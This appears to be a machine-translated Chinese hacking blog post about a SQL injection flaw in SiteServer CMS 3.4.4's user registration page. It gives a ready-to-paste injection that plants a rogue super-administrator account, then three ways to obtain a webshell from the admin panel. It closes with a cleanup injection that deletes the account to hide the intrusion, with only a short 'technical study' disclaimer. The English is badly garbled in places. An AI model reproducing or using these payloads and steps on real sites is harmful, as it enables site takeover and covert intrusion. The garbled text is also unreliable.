In these days to see a station when found this CMS, the online publication of some of the vulnerability, no specific version,
But in My in 3. 4. 4 on the actual test when found to be invalid, specifically for this purpose go to the official website a copy of the latest edition,
Looked at it and found some very funny questions. Introduction siteserver:this test version is:
SiteServer series products latest version: 3.4.4 full version (2 0 1 1 year 7 month 1 8 day release)
Download: http://www.siteserver.cn/download客户案例 to: http://www.siteserver.cn/customer
Also Baidu a bit and found that the number of customers or less.
Vulnerability Description: The problem is in the UserCenter. Pages. DLL in the Register, the registration process logic has a problem,
As follows: the program first put the user name into the database query, if the user name is not repeated, into the second step;
Then in the remote detection of the user name if it contains illegal characters, if not, the process proceeds to a third step;
The registration of new users into the database. Since in the first step, the program does not perform any processing it into
Database query, then you can xxoo.
Khttp://127.0.0.1/UserCenter/register. aspx user name fill in the following statement, and other places properly filled.
1 2 3');insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
Submitted after registration to the library insert a user name: blue password: lanhai super user.
Default background address: http://127.0.0.1/siteserver the background to the webshell: webshell or directly mention the right to a
Eyes of the beholder wise see wisdom of the living, each home has the home method, I probably looked, there are 3 kinds of method
Site management-on display functions-template management-on the Add single page template-direct generate aspx
Second, the members of the rights-of added user-on user name is: 1. asp
http://127.0.0.1/usercenter/ 用 刚才 添加 的 1.asp 去 登陆 to go in after uploading a personal avatar,
Using IIS6 parsing vulnerabilities have webshell ps: the background to add the user does not verify whether it contains illegal characters
System Tools-on the utility-of the machine parameters of the view can see the database type, name, WEB path System-Tools-on
Database tool-for the SQL statement to query this function to do good, directly is equivalent to a Query Analyzer, what echo,
Can backup have webshell, or the use of the sqlserver configuration improper direct XXOO in.
xxoo finished, remember to http://127.0.0.1/UserCenter/register. aspx
Then 1 2 3');delete bairong_Administrator where UserName='blue';–for the user name to be registered,
Do cleaner work. Finally, I hope siteserver see after timely repair, this article only as a technical study, do not for illegal purposes.